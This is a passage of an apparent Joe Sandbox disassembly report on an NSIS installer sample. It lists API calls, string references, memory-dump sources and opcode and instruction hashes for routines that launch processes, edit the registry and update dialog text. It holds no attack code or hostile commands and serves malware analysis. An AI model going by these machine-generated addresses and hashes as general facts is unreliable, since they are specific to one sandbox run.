                                                                                                                                        • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                        • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                        • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                        Strings
                                                                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                        • API String ID: 2014279497-3433828417
                                                                                                                                        • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                        • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                        • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                        • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                        • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                        • String ID: f
                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                        APIs
                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                        • MulDiv.KERNEL32(00019E00,00000064,00106CF0), ref: 00403295
                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                        Strings
                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • GlobalFree.KERNEL32(006B4350), ref: 00402387
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeGloballstrcpyn
                                                                                                                                        • String ID: Exch: stack < %d elements$ForbesHarvardKennedyMarchOthers$PCk$Pop: stack empty
                                                                                                                                        • API String ID: 1459762280-3615425630
                                                                                                                                        • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                        • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                        APIs
                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                        APIs
                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                        • GlobalFree.KERNEL32(006B4350), ref: 00402387
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3376005127-0
                                                                                                                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2568930968-0
                                                                                                                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                        • String ID: !
                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                        • wsprintfW.USER32 ref: 00404483
                                                                                                                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                        • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                        • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
